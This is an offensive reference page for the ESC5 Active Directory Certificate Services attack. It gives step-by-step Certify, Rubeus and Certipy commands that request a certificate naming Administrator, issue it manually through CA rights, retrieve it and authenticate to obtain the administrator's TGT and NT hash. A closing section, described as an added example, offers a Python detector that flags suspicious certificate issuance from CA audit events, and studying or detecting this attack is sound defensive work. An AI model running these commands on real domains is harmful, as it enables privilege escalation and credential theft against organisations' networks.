ESC5

Vulnerable PKI Object Access Control

Windows

Request a Certificate using SubCA template

PS /home/bobbuilder> .\Certify.exe request /ca:DC.minions.com\CA-minions /template:<template name> /altname:Administrator

Download Pending Request

PS /home/bobbuilder> .\Certify.exe download /ca:DC.minions.com\CA-minions /id:10

Convert PEM to PFX

Request the TGT and the NT Hash

PS /home/bobbuilder> .\Rubeus.exe asktgt /user:administrator /certificate:approved.pfx /getcredentials

Linux

Request a certificate as the Domain Administrator

bob$ certipy req -u user1 -p password1 -dc-ip <ip> -ns <ip> -dns-tcp -target-ip <ip> -ca CA-minions -template <template name> -upn Administrator

Issue the requested certificate

We approve the previous request by passing its request ID (10) to the -issue-request option.

bob$ certipy ca -u user1 -p password1 -dc-ip <ip> -ns <ip> -dns-tcp -target-ip <ip> -ca CA-minions -issue-request 10

Retrieve the issued certificate

We retrieve the issued certificate by passing the same request ID to the -retrieve option.

bob$ certipy req -u user1 -p password1 -dc-ip <ip> -ns <ip> -dns-tcp -target-ip <ip> -ca CA-minions -retrieve 10

Authenticate with the Administrator Certificate

bob$ certipy auth -pfx administrator.pfx -username administrator -domain minions.com -dc-ip <ip> -ns <ip> -dns-tcp
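
Detection

The request, manual issue and retrieve sequence above leaves a trail in the CA audit log (events 4886 to 4889). The following is an added example, not part of the original page: it correlates events by request ID and flags certificates that were issued after a denied or pending state, or that name a UPN other than the requester. The event records are constructed, and their dict layout and the san_upn field are assumptions about a normalised log feed, not the raw Windows event schema.

```python
from collections import defaultdict

# AD CS audit event IDs: request received, issued, denied, set to pending.
RECEIVED, ISSUED, DENIED, PENDING = 4886, 4887, 4888, 4889

# Constructed sample events in time order. The dict layout and the san_upn
# field are assumptions about a normalised feed, not the raw event schema.
SAMPLE_EVENTS = [
    {"id": RECEIVED, "request_id": 9, "requester": "MINIONS\\alice", "san_upn": "alice@minions.com"},
    {"id": ISSUED, "request_id": 9, "requester": "MINIONS\\alice", "san_upn": "alice@minions.com"},
    {"id": RECEIVED, "request_id": 10, "requester": "MINIONS\\user1", "san_upn": "Administrator@minions.com"},
    {"id": DENIED, "request_id": 10, "requester": "MINIONS\\user1", "san_upn": "Administrator@minions.com"},
    {"id": ISSUED, "request_id": 10, "requester": "MINIONS\\user1", "san_upn": "Administrator@minions.com"},
    {"id": RECEIVED, "request_id": 11, "requester": "MINIONS\\carol", "san_upn": "carol@minions.com"},
    {"id": PENDING, "request_id": 11, "requester": "MINIONS\\carol", "san_upn": "carol@minions.com"},
]


def account_name(value):
    """Reduce DOMAIN\\user or user@domain to a lower-case account name."""
    return value.split("\\")[-1].split("@")[0].lower()


def suspicious_requests(events):
    """Return {request_id: [reasons]} for issued requests that need review."""
    by_request = defaultdict(list)
    for ev in events:
        by_request[ev["request_id"]].append(ev)

    findings = {}
    for rid, evs in by_request.items():
        ids = [ev["id"] for ev in evs]
        if ISSUED not in ids:
            continue  # nothing was issued, so there is no certificate to review
        reasons = []
        # A hold (denied/pending) that precedes issuance means someone with
        # CA management rights released the request by hand.
        if any(i in (DENIED, PENDING) for i in ids[:ids.index(ISSUED)]):
            reasons.append("issued after denied/pending")
        # The certificate names a different principal than the requester.
        if any(account_name(ev["san_upn"]) != account_name(ev["requester"])
               for ev in evs if ev.get("san_upn")):
            reasons.append("SAN UPN differs from requester")
        if reasons:
            findings[rid] = reasons
    return findings


if __name__ == "__main__":
    print(suspicious_requests(SAMPLE_EVENTS))
```

These events are only written when auditing of "Issue and manage certificate requests" is enabled on the CA.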